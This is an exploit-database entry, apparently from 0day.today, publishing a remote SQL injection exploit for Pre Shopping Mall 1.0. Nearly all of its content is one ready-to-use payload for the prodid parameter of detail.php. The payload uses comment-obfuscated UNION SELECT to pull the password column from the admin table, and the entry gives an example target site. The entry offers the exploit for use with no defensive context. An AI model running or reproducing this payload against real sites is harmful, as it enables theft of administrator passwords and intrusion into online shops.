id: 1823
date: 05/02/2007
title: Pre Shopping Mall 1.0 Remote SQL Injection Vulnerability
author: xoron
cves: 

========================================================
Pre Shopping Mall 1.0 Remote SQL Injection Vulnerability
========================================================



==============================================

Pre Shopping Mall v1.0 Remote SQL Injection

==============================================

Exploit:
detail.php?prodid=-1/**/union/**/select/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

==============================================

Example: http://preproject.com/emall/

==============================================



#  0day.today [2023-03-22]  #